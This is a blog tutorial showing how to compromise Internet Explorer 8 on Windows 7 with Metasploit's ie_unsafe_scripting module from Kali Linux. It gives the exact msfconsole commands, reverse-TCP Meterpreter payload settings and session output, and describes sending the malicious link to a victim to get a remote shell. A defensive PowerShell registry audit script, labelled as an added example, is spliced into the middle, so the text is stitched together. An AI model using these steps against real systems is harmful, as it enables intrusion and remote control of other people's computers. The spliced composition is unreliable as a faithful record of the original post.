Saturday, 20 June 2015

Hack Internet Explorer 8 in Windows 7 using Kali Linux


In this tutorial, we will hack Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.

This exploit works only when the "Initialize and script ActiveX controls not marked as safe" setting is enabled in Internet Explorer (for the Internet zone it is disabled by default, so this is a deliberately weakened configuration).

To enable the above setting, start Internet Explorer and click on Tools -> Internet Options -> Security -> Custom Level -> "Initialize and script ActiveX controls not marked as safe" -> Enable.
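The setting enabled above is what the ie_unsafe_scripting module depends on, so the defender's counterpart to this step is checking that no zone on a workstation has it enabled. The following PowerShell script is an added example and is not part of the original post: it reads the per-zone registry value 1201 (the documented storage location of "Initialize and script ActiveX controls not marked as safe": 0 = Enable, 1 = Prompt, 3 = Disable) for every Internet Explorer zone, flags any zone where it is Enabled, and can set the Internet and Restricted sites zones back to Disable. The function names and the hypothetical reporting format are the example's own.

```powershell
# Added example, not part of the original tutorial: audit and remediate the
# Internet Explorer zone setting that exploit/windows/browser/ie_unsafe_scripting
# relies on. IE stores "Initialize and script ActiveX controls not marked as safe"
# per zone as the DWORD value 1201 (0 = Enable, 1 = Prompt, 3 = Disable) under
#   <hive>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\<zone id>
# Zone 3 is the Internet zone, which a link sent by e-mail or web page falls into.

$ZoneNames = @{ 0 = 'My Computer'; 1 = 'Local intranet'; 2 = 'Trusted sites'; 3 = 'Internet'; 4 = 'Restricted sites' }
$SettingNames = @{ 0 = 'Enable'; 1 = 'Prompt'; 3 = 'Disable' }

function Get-ZoneKeyPath {
    param([string]$Hive, [int]$Zone)
    # ${Hive} keeps PowerShell from parsing "$Hive:" as a drive-qualified variable
    return "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$Zone"
}

function Get-UnsafeActiveXScripting {
    # Lists value 1201 for every zone in one hive (HKCU = current user, HKLM = machine-wide).
    param([ValidateSet('HKCU', 'HKLM')][string]$Hive = 'HKCU')
    foreach ($zone in 0..4) {
        $key = Get-ZoneKeyPath -Hive $Hive -Zone $zone
        $raw = $null
        if (Test-Path -Path $key) {
            $raw = (Get-ItemProperty -Path $key -Name '1201' -ErrorAction SilentlyContinue).'1201'
        }
        $label = if ($null -eq $raw) { '(not set)' }
                 elseif ($SettingNames.ContainsKey([int]$raw)) { $SettingNames[[int]$raw] }
                 else { "unknown ($raw)" }
        [pscustomobject]@{
            Hive     = $Hive
            Zone     = $zone
            ZoneName = $ZoneNames[$zone]
            Value    = $raw
            Setting  = $label
            # Enabled anywhere except the My Computer zone means content from that
            # zone can script controls not marked safe, without a prompt.
            Exposed  = ($zone -ne 0 -and $raw -eq 0)
        }
    }
}

function Disable-UnsafeActiveXScripting {
    # Sets value 1201 back to 3 (Disable); defaults to the Internet and Restricted sites zones.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([ValidateSet('HKCU', 'HKLM')][string]$Hive = 'HKCU', [int[]]$Zones = @(3, 4))
    foreach ($zone in $Zones) {
        $key = Get-ZoneKeyPath -Hive $Hive -Zone $zone
        if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
        if ($PSCmdlet.ShouldProcess("$key\1201", 'Set to 3 (Disable)')) {
            Set-ItemProperty -Path $key -Name '1201' -Value 3 -Type DWord
        }
    }
}

# Usage: report first, warn on exposed zones, then remediate (-WhatIf previews the change).
Get-UnsafeActiveXScripting -Hive HKCU | Format-Table -AutoSize
Get-UnsafeActiveXScripting -Hive HKCU | Where-Object Exposed | ForEach-Object {
    Write-Warning "Zone $($_.Zone) ($($_.ZoneName)): unsafe ActiveX scripting is Enabled"
}
Disable-UnsafeActiveXScripting -Hive HKCU -WhatIf
```

Run the audit under each user profile that matters, and also against HKLM: when the "Security Zones: Use only machine settings" policy is in force, the machine-wide values take precedence over the per-user ones. In a managed environment the durable fix is the corresponding Group Policy setting under Internet Explorer > Internet Control Panel > Security Page > Internet Zone rather than a one-off registry write.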

We have the following configuration:
Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115

Perform the following steps on the Kali Linux machine.

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ie_unsafe_scripting

4) Select payload. 
msf exploit(ie_unsafe_scripting) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

5) View options.
msf exploit(ie_unsafe_scripting) > show options

Module options (exploit/windows/browser/ie_unsafe_scripting):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TECHNIQUE  VBS              yes       Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86/x64

6) Set options
msf exploit(ie_unsafe_scripting) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://0.0.0.0:8080/bHN7e4
[*]  Local IP: http://192.168.122.115:8080/bHN7e4
[*] Server started.


8) The user clicks on the malicious URL. As the output of the exploit command shows, a URL has been generated. This is the malicious link (http://192.168.122.115:8080/bHN7e4) that would have to be sent to the target so that it is opened in their browser.

When the user opens the link, the browser will try to load the page but nothing will be displayed. Meanwhile you will get a remote shell in msfconsole, as shown below.

msf exploit(ie_unsafe_scripting) > [*] 192.168.122.10   ie_unsafe_scripting - Request received for /bHN7e4
[*] 192.168.122.10   ie_unsafe_scripting - Sending exploit html/javascript
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Meterpreter session 1 opened (192.168.122.115:4444 -> 192.168.122.10:49166) at 2015-06-20 17:13:43 +0530

msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\shabbir\Desktop>


6 comments:

  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.

  3. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
